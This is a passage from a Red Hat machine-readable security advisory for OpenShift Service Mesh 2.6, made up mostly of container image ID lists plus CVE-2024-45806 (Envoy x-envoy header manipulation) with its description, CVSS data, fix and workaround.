"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "body-parser: Denial of Service Vulnerability in body-parser", }, { acknowledgments: [ { names: [ "Mike Whale", ], }, { names: [ "James Force", ], organization: "Red Hat", summary: "This issue was discovered by Red Hat.", }, ], cve: "CVE-2024-45806", cwe: { id: "CWE-639", name: "Authorization Bypass Through User-Controlled Key", }, discovery_date: "2024-09-20T00:40:20.976812+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2313683", }, ], notes: [ { category: "description", text: "A vulnerability was found in Envoy that allows external clients to manipulate Envoy headers, potentially leading to unauthorized access or other malicious actions within the mesh. This issue arises due to Envoy's default configuration of internal trust boundaries, which considers all RFC1918 private address ranges as internal. The default behavior for handling internal addresses in Envoy has been changed. Previously, RFC1918 IP addresses were automatically considered internal, even if the internal_address_config was empty. The default configuration of Envoy will continue to trust internal addresses while in this release and it will not trust them by default in next release. If you have tooling such as probes on your private network which need to be treated as trusted such as changing arbitrary x-envoy headers, please explicitly include those addresses or CIDR ranges into `internal_address_config`. Successful exploitation could allow attackers to bypass security controls, access sensitive data, or disrupt services within the mesh, like Istio.", title: "Vulnerability description", }, { category: "summary", text: "envoy: Potential to manipulate `x-envoy` headers from external sources", title: "Vulnerability summary", }, { category: "other", text: "Red Hat's CVSS score and impact are specific to our product and may not match those of upstream. This is due to how envoy is configured and used within our OpenShift Service Mesh product.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45806", }, { category: "external", summary: "RHBZ#2313683", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313683", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45806", url: "https://www.cve.org/CVERecord?id=CVE-2024-45806", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45806", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45806", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-ffhv-fvxq-r6mf", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-ffhv-fvxq-r6mf", }, ], release_date: "2024-09-20T00:15:02.293000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "workaround", details: "This flaw can be mitigated by configuring envoy to treat all IPs as external. This is done by setting the internal_address_config range for envoy to `0.0.0.0/32`.", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", 